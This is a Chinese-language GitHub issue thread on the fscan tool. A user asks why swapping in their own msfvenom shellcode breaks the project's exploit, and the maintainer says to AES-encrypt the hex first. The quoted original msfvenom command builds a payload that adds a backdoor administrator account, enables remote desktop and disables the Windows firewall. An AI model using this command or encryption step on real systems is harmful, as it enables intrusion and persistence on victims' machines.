### ISSUE TITLE
我改写了这句case "add":，请问这个exp生成完后报错是为什么啊？

### ISSUE THREAD

**Issue by Joe28abc** [shadow1ng/fscan#284]
这个是您的：		//msfvenom -p windows/x64/exec EXITFUNC=thread CMD='cmd.exe /c net user sysadmin "1qaz@WSX!@#4" /ADD && net localgroup Administrators sysadmin /ADD && REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f && netsh advfirewall set allprofiles state off' -f hex

我替换成这个：msfvenom -p windows/x64/exec EXITFUNC=thread CMD='cmd.exe /c calc.exe' -f hex 
得到hex后，直接替换你的 sc_enc := "xxxxxxxxx" 发现报错了，感觉生成的格式也不同

**Comment by shadow1ng** [comment]
先AesEncrypt 一下

**Comment by shadow1ng** [comment]
fmt.Printf("%x", c) 获取字符串格式
![image](https://github.com/shadow1ng/fscan/assets/39651966/98d62731-2b8f-402d-bbc6-e56121fe66b9)
